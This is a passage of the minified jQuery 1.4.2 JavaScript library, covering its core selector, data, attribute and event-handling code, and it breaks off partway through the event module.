// ---- f7ec7688d2_minify_jquery-1.4.2.js
(function(window,undefined){var jQuery=function(selector,context){return new jQuery.fn.init(selector,context);},_jQuery=window.jQuery,_$=window.$,document=window.document,rootjQuery,quickExpr=/^[^<]*(<[\w\W]+>)[^>]*$|^#([\w-]+)$/,isSimple=/^.[^:#\[\.,]*$/,rnotwhite=/\S/,rtrim=/^(\s|\u00A0)+|(\s|\u00A0)+$/g,rsingleTag=/^<(\w+)\s*\/?>(?:<\/\1>)?$/,userAgent=navigator.userAgent,browserMatch,readyBound=false,readyList=[],DOMContentLoaded,toString=Object.prototype.toString,hasOwnProperty=Object.prototype.hasOwnProperty,push=Array.prototype.push,slice=Array.prototype.slice,indexOf=Array.prototype.indexOf;jQuery.fn=jQuery.prototype={init:function(selector,context){var match,elem,ret,doc;if(!selector){return this;}
if(selector.nodeType){this.context=this[0]=selector;this.length=1;return this;}
if(selector==="body"&&!context){this.context=document;this[0]=document.body;this.selector="body";this.length=1;return this;}
if(typeof selector==="string"){match=quickExpr.exec(selector);if(match&&(match[1]||!context)){if(match[1]){doc=(context?context.ownerDocument||context:document);ret=rsingleTag.exec(selector);if(ret){if(jQuery.isPlainObject(context)){selector=[document.createElement(ret[1])];jQuery.fn.attr.call(selector,context,true);}else{selector=[doc.createElement(ret[1])];}}else{ret=buildFragment([match[1]],[doc]);selector=(ret.cacheable?ret.fragment.cloneNode(true):ret.fragment).childNodes;}
return jQuery.merge(this,selector);}else{elem=document.getElementById(match[2]);if(elem){if(elem.id!==match[2]){return rootjQuery.find(selector);}
this.length=1;this[0]=elem;}
this.context=document;this.selector=selector;return this;}}else if(!context&&/^\w+$/.test(selector)){this.selector=selector;this.context=document;selector=document.getElementsByTagName(selector);return jQuery.merge(this,selector);}else if(!context||context.jquery){return(context||rootjQuery).find(selector);}else{return jQuery(context).find(selector);}}else if(jQuery.isFunction(selector)){return rootjQuery.ready(selector);}
if(selector.selector!==undefined){this.selector=selector.selector;this.context=selector.context;}
return jQuery.makeArray(selector,this);},selector:"",jquery:"1.4.2",length:0,size:function(){return this.length;},toArray:function(){return slice.call(this,0);},get:function(num){return num==null?this.toArray():(num<0?this.slice(num)[0]:this[num]);},pushStack:function(elems,name,selector){var ret=jQuery();if(jQuery.isArray(elems)){push.apply(ret,elems);}else{jQuery.merge(ret,elems);}
ret.prevObject=this;ret.context=this.context;if(name==="find"){ret.selector=this.selector+(this.selector?" ":"")+selector;}else if(name){ret.selector=this.selector+"."+name+"("+selector+")";}
return ret;},each:function(callback,args){return jQuery.each(this,callback,args);},ready:function(fn){jQuery.bindReady();if(jQuery.isReady){fn.call(document,jQuery);}else if(readyList){readyList.push(fn);}
return this;},eq:function(i){return i===-1?this.slice(i):this.slice(i,+i+1);},first:function(){return this.eq(0);},last:function(){return this.eq(-1);},slice:function(){return this.pushStack(slice.apply(this,arguments),"slice",slice.call(arguments).join(","));},map:function(callback){return this.pushStack(jQuery.map(this,function(elem,i){return callback.call(elem,i,elem);}));},end:function(){return this.prevObject||jQuery(null);},push:push,sort:[].sort,splice:[].splice};jQuery.fn.init.prototype=jQuery.fn;jQuery.extend=jQuery.fn.extend=function(){var target=arguments[0]||{},i=1,length=arguments.length,deep=false,options,name,src,copy;if(typeof target==="boolean"){deep=target;target=arguments[1]||{};i=2;}
if(typeof target!=="object"&&!jQuery.isFunction(target)){target={};}
if(length===i){target=this;--i;}
for(;i<length;i++){if((options=arguments[i])!=null){for(name in options){src=target[name];copy=options[name];if(target===copy){continue;}
if(deep&&copy&&(jQuery.isPlainObject(copy)||jQuery.isArray(copy))){var clone=src&&(jQuery.isPlainObject(src)||jQuery.isArray(src))?src:jQuery.isArray(copy)?[]:{};target[name]=jQuery.extend(deep,clone,copy);}else if(copy!==undefined){target[name]=copy;}}}}
return target;};jQuery.extend({noConflict:function(deep){window.$=_$;if(deep){window.jQuery=_jQuery;}
return jQuery;},isReady:false,ready:function(){if(!jQuery.isReady){if(!document.body){return setTimeout(jQuery.ready,13);}
jQuery.isReady=true;if(readyList){var fn,i=0;while((fn=readyList[i++])){fn.call(document,jQuery);}
readyList=null;}
if(jQuery.fn.triggerHandler){jQuery(document).triggerHandler("ready");}}},bindReady:function(){if(readyBound){return;}
readyBound=true;if(document.readyState==="complete"){return jQuery.ready();}
if(document.addEventListener){document.addEventListener("DOMContentLoaded",DOMContentLoaded,false);window.addEventListener("load",jQuery.ready,false);}else if(document.attachEvent){document.attachEvent("onreadystatechange",DOMContentLoaded);window.attachEvent("onload",jQuery.ready);var toplevel=false;try{toplevel=window.frameElement==null;}catch(e){}
if(document.documentElement.doScroll&&toplevel){doScrollCheck();}}},isFunction:function(obj){return toString.call(obj)==="[object Function]";},isArray:function(obj){return toString.call(obj)==="[object Array]";},isPlainObject:function(obj){if(!obj||toString.call(obj)!=="[object Object]"||obj.nodeType||obj.setInterval){return false;}
if(obj.constructor&&!hasOwnProperty.call(obj,"constructor")&&!hasOwnProperty.call(obj.constructor.prototype,"isPrototypeOf")){return false;}
var key;for(key in obj){}
return key===undefined||hasOwnProperty.call(obj,key);},isEmptyObject:function(obj){for(var name in obj){return false;}
return true;},error:function(msg){throw msg;},parseJSON:function(data){if(typeof data!=="string"||!data){return null;}
data=jQuery.trim(data);if(/^[\],:{}\s]*$/.test(data.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g,"@").replace(/"[^"\\\n\r]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g,"]").replace(/(?:^|:|,)(?:\s*\[)+/g,""))){return window.JSON&&window.JSON.parse?window.JSON.parse(data):(new Function("return "+data))();}else{jQuery.error("Invalid JSON: "+data);}},noop:function(){},globalEval:function(data){if(data&&rnotwhite.test(data)){var head=document.getElementsByTagName("head")[0]||document.documentElement,script=document.createElement("script");script.type="text/javascript";if(jQuery.support.scriptEval){script.appendChild(document.createTextNode(data));}else{script.text=data;}
head.insertBefore(script,head.firstChild);head.removeChild(script);}},nodeName:function(elem,name){return elem.nodeName&&elem.nodeName.toUpperCase()===name.toUpperCase();},each:function(object,callback,args){var name,i=0,length=object.length,isObj=length===undefined||jQuery.isFunction(object);if(args){if(isObj){for(name in object){if(callback.apply(object[name],args)===false){break;}}}else{for(;i<length;){if(callback.apply(object[i++],args)===false){break;}}}}else{if(isObj){for(name in object){if(callback.call(object[name],name,object[name])===false){break;}}}else{for(var value=object[0];i<length&&callback.call(value,i,value)!==false;value=object[++i]){}}}
return object;},trim:function(text){return(text||"").replace(rtrim,"");},makeArray:function(array,results){var ret=results||[];if(array!=null){if(array.length==null||typeof array==="string"||jQuery.isFunction(array)||(typeof array!=="function"&&array.setInterval)){push.call(ret,array);}else{jQuery.merge(ret,array);}}
return ret;},inArray:function(elem,array){if(array.indexOf){return array.indexOf(elem);}
for(var i=0,length=array.length;i<length;i++){if(array[i]===elem){return i;}}
return-1;},merge:function(first,second){var i=first.length,j=0;if(typeof second.length==="number"){for(var l=second.length;j<l;j++){first[i++]=second[j];}}else{while(second[j]!==undefined){first[i++]=second[j++];}}
first.length=i;return first;},grep:function(elems,callback,inv){var ret=[];for(var i=0,length=elems.length;i<length;i++){if(!inv!==!callback(elems[i],i)){ret.push(elems[i]);}}
return ret;},map:function(elems,callback,arg){var ret=[],value;for(var i=0,length=elems.length;i<length;i++){value=callback(elems[i],i,arg);if(value!=null){ret[ret.length]=value;}}
return ret.concat.apply([],ret);},guid:1,proxy:function(fn,proxy,thisObject){if(arguments.length===2){if(typeof proxy==="string"){thisObject=fn;fn=thisObject[proxy];proxy=undefined;}else if(proxy&&!jQuery.isFunction(proxy)){thisObject=proxy;proxy=undefined;}}
if(!proxy&&fn){proxy=function(){return fn.apply(thisObject||this,arguments);};}
if(fn){proxy.guid=fn.guid=fn.guid||proxy.guid||jQuery.guid++;}
return proxy;},uaMatch:function(ua){ua=ua.toLowerCase();var match=/(webkit)[ \/]([\w.]+)/.exec(ua)||/(opera)(?:.*version)?[ \/]([\w.]+)/.exec(ua)||/(msie) ([\w.]+)/.exec(ua)||!/compatible/.test(ua)&&/(mozilla)(?:.*? rv:([\w.]+))?/.exec(ua)||[];return{browser:match[1]||"",version:match[2]||"0"};},browser:{}});browserMatch=jQuery.uaMatch(userAgent);if(browserMatch.browser){jQuery.browser[browserMatch.browser]=true;jQuery.browser.version=browserMatch.version;}
if(jQuery.browser.webkit){jQuery.browser.safari=true;}
if(indexOf){jQuery.inArray=function(elem,array){return indexOf.call(array,elem);};}
rootjQuery=jQuery(document);if(document.addEventListener){DOMContentLoaded=function(){document.removeEventListener("DOMContentLoaded",DOMContentLoaded,false);jQuery.ready();};}else if(document.attachEvent){DOMContentLoaded=function(){if(document.readyState==="complete"){document.detachEvent("onreadystatechange",DOMContentLoaded);jQuery.ready();}};}
function doScrollCheck(){if(jQuery.isReady){return;}
try{document.documentElement.doScroll("left");}catch(error){setTimeout(doScrollCheck,1);return;}
jQuery.ready();}
function evalScript(i,elem){if(elem.src){jQuery.ajax({url:elem.src,async:false,dataType:"script"});}else{jQuery.globalEval(elem.text||elem.textContent||elem.innerHTML||"");}
if(elem.parentNode){elem.parentNode.removeChild(elem);}}
function access(elems,key,value,exec,fn,pass){var length=elems.length;if(typeof key==="object"){for(var k in key){access(elems,k,key[k],exec,fn,value);}
return elems;}
if(value!==undefined){exec=!pass&&exec&&jQuery.isFunction(value);for(var i=0;i<length;i++){fn(elems[i],key,exec?value.call(elems[i],i,fn(elems[i],key)):value,pass);}
return elems;}
return length?fn(elems[0],key):undefined;}
function now(){return(new Date).getTime();}
(function(){jQuery.support={};var root=document.documentElement,script=document.createElement("script"),div=document.createElement("div"),id="script"+now();div.style.display="none";div.innerHTML="   <link/><table></table><a href='/a' style='color:red;float:left;opacity:.55;'>a</a><input type='checkbox'/>";var all=div.getElementsByTagName("*"),a=div.getElementsByTagName("a")[0];if(!all||!all.length||!a){return;}
jQuery.support={leadingWhitespace:div.firstChild.nodeType===3,tbody:!div.getElementsByTagName("tbody").length,htmlSerialize:!!div.getElementsByTagName("link").length,style:/red/.test(a.getAttribute("style")),hrefNormalized:a.getAttribute("href")==="/a",opacity:/^0.55$/.test(a.style.opacity),cssFloat:!!a.style.cssFloat,checkOn:div.getElementsByTagName("input")[0].value==="on",optSelected:document.createElement("select").appendChild(document.createElement("option")).selected,parentNode:div.removeChild(div.appendChild(document.createElement("div"))).parentNode===null,deleteExpando:true,checkClone:false,scriptEval:false,noCloneEvent:true,boxModel:null};script.type="text/javascript";try{script.appendChild(document.createTextNode("window."+id+"=1;"));}catch(e){}
root.insertBefore(script,root.firstChild);if(window[id]){jQuery.support.scriptEval=true;delete window[id];}
try{delete script.test;}catch(e){jQuery.support.deleteExpando=false;}
root.removeChild(script);if(div.attachEvent&&div.fireEvent){div.attachEvent("onclick",function click(){jQuery.support.noCloneEvent=false;div.detachEvent("onclick",click);});div.cloneNode(true).fireEvent("onclick");}
div=document.createElement("div");div.innerHTML="<input type='radio' name='radiotest' checked='checked'/>";var fragment=document.createDocumentFragment();fragment.appendChild(div.firstChild);jQuery.support.checkClone=fragment.cloneNode(true).cloneNode(true).lastChild.checked;jQuery(function(){var div=document.createElement("div");div.style.width=div.style.paddingLeft="1px";document.body.appendChild(div);jQuery.boxModel=jQuery.support.boxModel=div.offsetWidth===2;document.body.removeChild(div).style.display='none';div=null;});var eventSupported=function(eventName){var el=document.createElement("div");eventName="on"+eventName;var isSupported=(eventName in el);if(!isSupported){el.setAttribute(eventName,"return;");isSupported=typeof el[eventName]==="function";}
el=null;return isSupported;};jQuery.support.submitBubbles=eventSupported("submit");jQuery.support.changeBubbles=eventSupported("change");root=script=div=all=a=null;})();jQuery.props={"for":"htmlFor","class":"className",readonly:"readOnly",maxlength:"maxLength",cellspacing:"cellSpacing",rowspan:"rowSpan",colspan:"colSpan",tabindex:"tabIndex",usemap:"useMap",frameborder:"frameBorder"};var expando="jQuery"+now(),uuid=0,windowData={};jQuery.extend({cache:{},expando:expando,noData:{"embed":true,"object":true,"applet":true},data:function(elem,name,data){if(elem.nodeName&&jQuery.noData[elem.nodeName.toLowerCase()]){return;}
elem=elem==window?windowData:elem;var id=elem[expando],cache=jQuery.cache,thisCache;if(!id&&typeof name==="string"&&data===undefined){return null;}
if(!id){id=++uuid;}
if(typeof name==="object"){elem[expando]=id;thisCache=cache[id]=jQuery.extend(true,{},name);}else if(!cache[id]){elem[expando]=id;cache[id]={};}
thisCache=cache[id];if(data!==undefined){thisCache[name]=data;}
return typeof name==="string"?thisCache[name]:thisCache;},removeData:function(elem,name){if(elem.nodeName&&jQuery.noData[elem.nodeName.toLowerCase()]){return;}
elem=elem==window?windowData:elem;var id=elem[expando],cache=jQuery.cache,thisCache=cache[id];if(name){if(thisCache){delete thisCache[name];if(jQuery.isEmptyObject(thisCache)){jQuery.removeData(elem);}}}else{if(jQuery.support.deleteExpando){delete elem[jQuery.expando];}else if(elem.removeAttribute){elem.removeAttribute(jQuery.expando);}
delete cache[id];}}});jQuery.fn.extend({data:function(key,value){if(typeof key==="undefined"&&this.length){return jQuery.data(this[0]);}else if(typeof key==="object"){return this.each(function(){jQuery.data(this,key);});}
var parts=key.split(".");parts[1]=parts[1]?"."+parts[1]:"";if(value===undefined){var data=this.triggerHandler("getData"+parts[1]+"!",[parts[0]]);if(data===undefined&&this.length){data=jQuery.data(this[0],key);}
return data===undefined&&parts[1]?this.data(parts[0]):data;}else{return this.trigger("setData"+parts[1]+"!",[parts[0],value]).each(function(){jQuery.data(this,key,value);});}},removeData:function(key){return this.each(function(){jQuery.removeData(this,key);});}});jQuery.extend({queue:function(elem,type,data){if(!elem){return;}
type=(type||"fx")+"queue";var q=jQuery.data(elem,type);if(!data){return q||[];}
if(!q||jQuery.isArray(data)){q=jQuery.data(elem,type,jQuery.makeArray(data));}else{q.push(data);}
return q;},dequeue:function(elem,type){type=type||"fx";var queue=jQuery.queue(elem,type),fn=queue.shift();if(fn==="inprogress"){fn=queue.shift();}
if(fn){if(type==="fx"){queue.unshift("inprogress");}
fn.call(elem,function(){jQuery.dequeue(elem,type);});}}});jQuery.fn.extend({queue:function(type,data){if(typeof type!=="string"){data=type;type="fx";}
if(data===undefined){return jQuery.queue(this[0],type);}
return this.each(function(i,elem){var queue=jQuery.queue(this,type,data);if(type==="fx"&&queue[0]!=="inprogress"){jQuery.dequeue(this,type);}});},dequeue:function(type){return this.each(function(){jQuery.dequeue(this,type);});},delay:function(time,type){time=jQuery.fx?jQuery.fx.speeds[time]||time:time;type=type||"fx";return this.queue(type,function(){var elem=this;setTimeout(function(){jQuery.dequeue(elem,type);},time);});},clearQueue:function(type){return this.queue(type||"fx",[]);}});var rclass=/[\n\t]/g,rspace=/\s+/,rreturn=/\r/g,rspecialurl=/href|src|style/,rtype=/(button|input)/i,rfocusable=/(button|input|object|select|textarea)/i,rclickable=/^(a|area)$/i,rradiocheck=/radio|checkbox/;jQuery.fn.extend({attr:function(name,value){return access(this,name,value,true,jQuery.attr);},removeAttr:function(name,fn){return this.each(function(){jQuery.attr(this,name,"");if(this.nodeType===1){this.removeAttribute(name);}});},addClass:function(value){if(jQuery.isFunction(value)){return this.each(function(i){var self=jQuery(this);self.addClass(value.call(this,i,self.attr("class")));});}
if(value&&typeof value==="string"){var classNames=(value||"").split(rspace);for(var i=0,l=this.length;i<l;i++){var elem=this[i];if(elem.nodeType===1){if(!elem.className){elem.className=value;}else{var className=" "+elem.className+" ",setClass=elem.className;for(var c=0,cl=classNames.length;c<cl;c++){if(className.indexOf(" "+classNames[c]+" ")<0){setClass+=" "+classNames[c];}}
elem.className=jQuery.trim(setClass);}}}}
return this;},removeClass:function(value){if(jQuery.isFunction(value)){return this.each(function(i){var self=jQuery(this);self.removeClass(value.call(this,i,self.attr("class")));});}
if((value&&typeof value==="string")||value===undefined){var classNames=(value||"").split(rspace);for(var i=0,l=this.length;i<l;i++){var elem=this[i];if(elem.nodeType===1&&elem.className){if(value){var className=(" "+elem.className+" ").replace(rclass," ");for(var c=0,cl=classNames.length;c<cl;c++){className=className.replace(" "+classNames[c]+" "," ");}
elem.className=jQuery.trim(className);}else{elem.className="";}}}}
return this;},toggleClass:function(value,stateVal){var type=typeof value,isBool=typeof stateVal==="boolean";if(jQuery.isFunction(value)){return this.each(function(i){var self=jQuery(this);self.toggleClass(value.call(this,i,self.attr("class"),stateVal),stateVal);});}
return this.each(function(){if(type==="string"){var className,i=0,self=jQuery(this),state=stateVal,classNames=value.split(rspace);while((className=classNames[i++])){state=isBool?state:!self.hasClass(className);self[state?"addClass":"removeClass"](className);}}else if(type==="undefined"||type==="boolean"){if(this.className){jQuery.data(this,"__className__",this.className);}
this.className=this.className||value===false?"":jQuery.data(this,"__className__")||"";}});},hasClass:function(selector){var className=" "+selector+" ";for(var i=0,l=this.length;i<l;i++){if((" "+this[i].className+" ").replace(rclass," ").indexOf(className)>-1){return true;}}
return false;},val:function(value){if(value===undefined){var elem=this[0];if(elem){if(jQuery.nodeName(elem,"option")){return(elem.attributes.value||{}).specified?elem.value:elem.text;}
if(jQuery.nodeName(elem,"select")){var index=elem.selectedIndex,values=[],options=elem.options,one=elem.type==="select-one";if(index<0){return null;}
for(var i=one?index:0,max=one?index+1:options.length;i<max;i++){var option=options[i];if(option.selected){value=jQuery(option).val();if(one){return value;}
values.push(value);}}
return values;}
if(rradiocheck.test(elem.type)&&!jQuery.support.checkOn){return elem.getAttribute("value")===null?"on":elem.value;}
return(elem.value||"").replace(rreturn,"");}
return undefined;}
var isFunction=jQuery.isFunction(value);return this.each(function(i){var self=jQuery(this),val=value;if(this.nodeType!==1){return;}
if(isFunction){val=value.call(this,i,self.val());}
if(typeof val==="number"){val+="";}
if(jQuery.isArray(val)&&rradiocheck.test(this.type)){this.checked=jQuery.inArray(self.val(),val)>=0;}else if(jQuery.nodeName(this,"select")){var values=jQuery.makeArray(val);jQuery("option",this).each(function(){this.selected=jQuery.inArray(jQuery(this).val(),values)>=0;});if(!values.length){this.selectedIndex=-1;}}else{this.value=val;}});}});jQuery.extend({attrFn:{val:true,css:true,html:true,text:true,data:true,width:true,height:true,offset:true},attr:function(elem,name,value,pass){if(!elem||elem.nodeType===3||elem.nodeType===8){return undefined;}
if(pass&&name in jQuery.attrFn){return jQuery(elem)[name](value);}
var notxml=elem.nodeType!==1||!jQuery.isXMLDoc(elem),set=value!==undefined;name=notxml&&jQuery.props[name]||name;if(elem.nodeType===1){var special=rspecialurl.test(name);if(name==="selected"&&!jQuery.support.optSelected){var parent=elem.parentNode;if(parent){parent.selectedIndex;if(parent.parentNode){parent.parentNode.selectedIndex;}}}
if(name in elem&&notxml&&!special){if(set){if(name==="type"&&rtype.test(elem.nodeName)&&elem.parentNode){jQuery.error("type property can't be changed");}
elem[name]=value;}
if(jQuery.nodeName(elem,"form")&&elem.getAttributeNode(name)){return elem.getAttributeNode(name).nodeValue;}
if(name==="tabIndex"){var attributeNode=elem.getAttributeNode("tabIndex");return attributeNode&&attributeNode.specified?attributeNode.value:rfocusable.test(elem.nodeName)||rclickable.test(elem.nodeName)&&elem.href?0:undefined;}
return elem[name];}
if(!jQuery.support.style&&notxml&&name==="style"){if(set){elem.style.cssText=""+value;}
return elem.style.cssText;}
if(set){elem.setAttribute(name,""+value);}
var attr=!jQuery.support.hrefNormalized&&notxml&&special?elem.getAttribute(name,2):elem.getAttribute(name);return attr===null?undefined:attr;}
return jQuery.style(elem,name,value);}});var rnamespaces=/\.(.*)$/,fcleanup=function(nm){return nm.replace(/[^\w\s\.\|`]/g,function(ch){return"\\"+ch;});};jQuery.event={add:function(elem,types,handler,data){if(elem.nodeType===3||elem.nodeType===8){return;}
if(elem.setInterval&&(elem!==window&&!elem.frameElement)){elem=window;}
var handleObjIn,handleObj;if(handler.handler){handleObjIn=handler;handler=handleObjIn.handler;}
if(!handler.guid){handler.guid=jQuery.guid++;}
var elemData=jQuery.data(elem);if(!elemData){return;}
var events=elemData.events=elemData.events||{},eventHandle=elemData.handle,eventHandle;if(!eventHandle){elemData.handle=eventHandle=function(){return typeof jQuery!=="undefined"&&!jQuery.event.triggered?jQuery.event.handle.apply(eventHandle.elem,arguments):undefined;};}
eventHandle.elem=elem;types=types.split(" ");var type,i=0,namespaces;while((type=types[i++])){handleObj=handleObjIn?jQuery.extend({},handleObjIn):{handler:handler,data:data};if(type.indexOf(".")>-1){namespaces=type.split(".");type=namespaces.shift();handleObj.namespace=namespaces.slice(0).sort().join(".");}else{namespaces=[];handleObj.namespace="";}
handleObj.type=type;handleObj.guid=handler.guid;var handlers=events[type],special=jQuery.event.special[type]||{};if(!handlers){handlers=events[type]=[];if(!special.setup||special.setup.call(elem,data,namespaces,eventHandle)===false){if(elem.addEventListener){elem.addEventListener(type,eventHandle,false);}else if(elem.attachEvent){elem.attachEvent("on"+type,eventHandle);}}}
if(special.add){special.add.call(elem,handleObj);if(!handleObj.handler.guid){handleObj.handler.guid=handler.guid;}}
handlers.push(handleObj);jQuery.event.global[type]=true;}
elem=null;},global:{},remove:function(elem,types,handler,pos){if(elem.nodeType===3||elem.nodeType===8){return;}
var ret,type,fn,i=0,all,namespaces,namespace,special,eventType,handleObj,origType,elemData=jQuery.data(elem),events=elemData&&elemData.events;if(!elemData||!events){return;}
if(types&&types.type){handler=types.handler;types=types.type;}
if(!types||typeof types==="string"&&types.charAt(0)==="."){types=types||"";for(type in events){jQuery.event.remove(elem,type+types);}
return;}
types=types.split(" ");while((type=types[i++])){origType=type;handleObj=null;all=type.indexOf(".")<0;namespaces=[];if(!all){namespaces=type.split(".");type=namespaces.shift();namespace=new RegExp("(^|\\.)"+
jQuery.map(namespaces.slice(0).sort(),fcleanup).join("\\.(?:.*\\.)?")+"(\\.|$)")}
eventType=events[type];if(!eventType){continue;}
if(!handler){for(var j=0;j<eventType.length;j++){handleObj=eventType[j];if(all||namespace.test(handleObj.namespace)){jQuery.event.remove(elem,origType,handleObj.handler,j);eventType.splice(j--,1);}}
continue;}
special=jQuery.event.special[type]||{};for(var j=pos||0;j<eventType.length;j++){handleObj=eventType[j];if(handler.guid===handleObj.guid){if(all||namespace.test(handleObj.namespace)){if(pos==null){eventType.splice(j--,1);}
if(special.remove){special.remove.call(elem,handleObj);}}
if(pos!=null){break;}}}
if(eventType.length===0||pos!=null&&eventType.length===1){if(!special.teardown||special.teardown.call(elem,namespaces)===false){removeEvent(elem,type,elemData.handle);}
ret=null;delete events[type];}}
if(jQuery.isEmptyObject(events)){var handle=elemData.handle;if(handle){handle.elem=null;}
delete elemData.events;delete elemData.handle;if(jQuery.isEmptyObject(elemData)){jQuery.removeData(elem);}}},trigger:function(event,data,elem){var type=event.type||event,bubbling=arguments[3];if(!bubbling){event=typeof event==="object"?event[expando]?event:jQuery.extend(jQuery.Event(type),event):jQuery.Event(type);if(type.indexOf("!")>=0){event.type=type=type.slice(0,-1);event.exclusive=true;}
if(!elem){event.stopPropagation();if(jQuery.event.global[type]){jQuery.each(jQuery.cache,function(){if(this.events&&this.events[type]){jQuery.event.trigger(event,data,this.handle.elem);}});}}
if(!elem||elem.nodeType===3||elem.nodeType===8){return undefined;}
event.result=undefined;event.target=elem;data=jQuery.makeArray(data);data.unshift(event);}
event.currentTarget=elem;var handle=jQuery.data(elem,"handle");if(handle){handle.apply(elem,data);}
var parent=elem.parentNode||elem.ownerDocument;try{if(!(elem&&elem.nodeName&&jQuery.noData[elem.nodeName.toLowerCase()])){if(elem["on"+type]&&elem["on"+type].apply(elem,data)===false){event.result=false;}}}catch(e){}
if(!event.isPropagationStopped()&&parent){jQuery.event.trigger(event,data,parent,true);}else if(!event.isDefaultPrevented()){var target=event.target,old,isClick=jQuery.nodeName(target,"a")&&type==="click",special=jQuery.event.special[type]||{};if((!special._default||special._default.call(elem,event)===false)&&!isClick&&!(target&&target.nodeName&&jQuery.noData[target.nodeName.toLowerCase()])){try{if(target[type]){old=target["on"+type];if(old){target["on"+type]=null;}
jQuery.event.triggered=true;target[type]();}}catch(e){}
if(old){target["on"+type]=old;}
jQuery.event.triggered=false;}}},handle:function(event){var all,handlers,namespaces,namespace,events;event=arguments[0]=jQuery.event.fix(event||window.event);event.currentTarget=this;all=event.type.indexOf(".")<0&&!event.exclusive;if(!all){namespaces=event.type.split(".");event.type=namespaces.shift();namespace=new RegExp("(^|\\.)"+namespaces.slice(0).sort().join("\\.(?:.*\\.)?")+"(\\.|$)");}
var events=jQuery.data(this,"events"),handlers=events[event.type];if(events&&handlers){handlers=handlers.slice(0);for(var j=0,l=handlers.length;j<l;j++){var handleObj=handlers[j];if(all||namespace.test(handleObj.namespace)){event.handler=handleObj.handler;event.data=handleObj.data;event.handleObj=handleObj;var ret=handleObj.handler.apply(this,arguments);if(ret!==undefined){event.result=ret;if(ret===false){event.preventDefault();event.stopPropagation();}}
if(event.isImmediatePropagationStopped()){break;}}}}
return event.result;},props:"altKey attrChange attrName bubbles button cancelable charCode clientX clientY ctrlKey currentTarget data detail eventPhase fromElement handler keyCode layerX layerY metaKey newValue offsetX offsetY originalTarget pageX pageY prevValue relatedNode relatedTarget screenX screenY shiftKey srcElement target toElement view wheelDelta which".split(" "),fix:function(event){if(event[expando]){return event;}
var originalEvent=event;event=jQuery.Event(originalEvent);for(var i=this.props.length,prop;i;){prop=this.props[--i];event[prop]=originalEvent[prop];}
if(!event.target){event.target=event.srcElement||document;}
if(event.target.nodeType===3){event.target=event.target.parentNode;}
if(!event.relatedTarget&&event.fromElement){event.relatedTarget=event.fromElement===event.target?event.toElement:event.fromElement;}
if(event.pageX==null&&event.clientX!=null){var doc=document.documentElement,body=document.body;event.pageX=event.clientX+(doc&&doc.scrollLeft||body&&body.scrollLeft||0)-(doc&&doc.clientLeft||body&&body.clientLeft||0);event.pageY=event.clientY+(doc&&doc.scrollTop||body&&body.scrollTop||0)-(doc&&doc.clientTop||body&&body.clientTop||0);}
if(!event.which&&((event.charCode||event.charCode===0)?event.charCode:event.keyCode)){event.which=event.charCode||event.keyCode;}
if(!event.metaKey&&event.ctrlKey){event.metaKey=event.ctrlKey;}
if(!event.which&&event.button!==undefined){event.which=(event.button&1?1:(event.button&2?3:(event.button&4?2:0)));}
return event;},guid:1E8,proxy:jQuery.proxy,special:{ready:{setup:jQuery.bindReady,teardown:jQuery.noop},live:{add:function(handleObj){jQuery.event.add(this,handleObj.origType,jQuery.extend({},handleObj,{handler:liveHandler}));},remove:function(handleObj){var remove=true,type=handleObj.origType.replace(rnamespaces,"");jQuery.each(jQuery.data(this,"events").live||[],function(){if(type===this.origType.replace(rnamespaces,"")){remove=false;return false;}});if(remove){jQuery.event.remove(this,handleObj.origType,liveHandler);}}},beforeunload:{setup:function(data,namespaces,eventHandle){if(this.setInterval){this.onbeforeunload=eventHandle;}
return false;},teardown:function(namespaces,eventHandle){if(this.onbeforeunload===eventHandle){this.onbeforeunload=null;}}}}};var removeEvent=document.removeEventListener?function(elem,type,handle){elem.removeEventListener(type,handle,false);}:function(elem,type,handle){elem.detachEvent("on"+type,handle);};jQuery.Event=function(src){if(!this.preventDefault){return new jQuery.Event(src);}
if(src&&src.type){this.originalEvent=src;this.type=src.type;}else{this.type=src;}
this.timeStamp=now();this[expando]=true;};function returnFalse(){return false;}
function returnTrue(){return true;}
jQuery.Event.prototype={preventDefault:function(){this.isDefaultPrevented=returnTrue;var e=this.originalEvent;if(!e){return;}
if(e.preventDefault){e.preventDefault();}
e.returnValue=false;},stopPropagation:function(){this.isPropagationStopped=returnTrue;var e=this.originalEvent;if(!e){return;}
if(e.stopPropagation){e.stopPropagation();}
e.cancelBubble=true;},stopImmediatePropagation:function(){this.isImmediatePropagationStopped=returnTrue;this.stopPropagation();},isDefaultPrevented:returnFalse,isPropagationStopped:returnFalse,isImmediatePropagationStopped:returnFalse};var withinElement=function(event){var parent=event.relatedTarget;try{while(parent&&parent!==this){parent=parent.parentNode;}
if(parent!==this){event.type=event.data;jQuery.event.handle.apply(this,arguments);}}catch(e){}},delegate=function(event){event.type=event.data;jQuery.event.handle.apply(this,arguments);};jQuery.each({mouseenter:"mouseover",mouseleave:"mouseout"},function(orig,fix){jQuery.event.special[orig]={setup:function(data){jQuery.event.add(this,fix,data&&data.selector?delegate:withinElement,orig);},teardown:function(data){jQuery.event.remove(this,fix,data&&data.selector?delegate:withinElement);}};});if(!jQuery.support.submitBubbles){jQuery.event.special.submit={setup:function(data,namespaces){if(this.nodeName.toLowerCase()!=="form"){jQuery.event.add(this,"click.specialSubmit",function(e){var elem=e.target,type=elem.type;if((type==="submit"||type==="image")&&jQuery(elem).closest("form").length){return trigger("submit",this,arguments);}});jQuery.event.add(this,"keypress.specialSubmit",function(e){var elem=e.target,type=elem.type;if((type==="text"||type==="password")&&jQuery(elem).closest("form").length&&e.keyCode===13){return trigger("submit",this,arguments);}});}else{return false;}},teardown:function(namespaces){jQuery.event.remove(this,".specialSubmit");}};}
if(!jQuery.support.changeBubbles){var formElems=/textarea|input|select/i,changeFilters,getVal=function(elem){var type=elem.type,val=elem.value;if(type==="radio"||type==="checkbox"){val=elem.checked;}else if(type==="select-multiple"){val=elem.selectedIndex>-1?jQuery.map(elem.options,function(elem){return elem.selected;}).join("-"):"";}else if(elem.nodeName.toLowerCase()==="select"){val=elem.selectedIndex;}
return val;},testChange=function testChange(e){var elem=e.target,data,val;if(!formElems.test(elem.nodeName)||elem.readOnly){return;}
data=jQuery.data(elem,"_change_data");val=getVal(elem);if(e.type!=="focusout"||elem.type!=="radio"){jQuery.data(elem,"_change_data",val);}
if(data===undefined||val===data){return;}
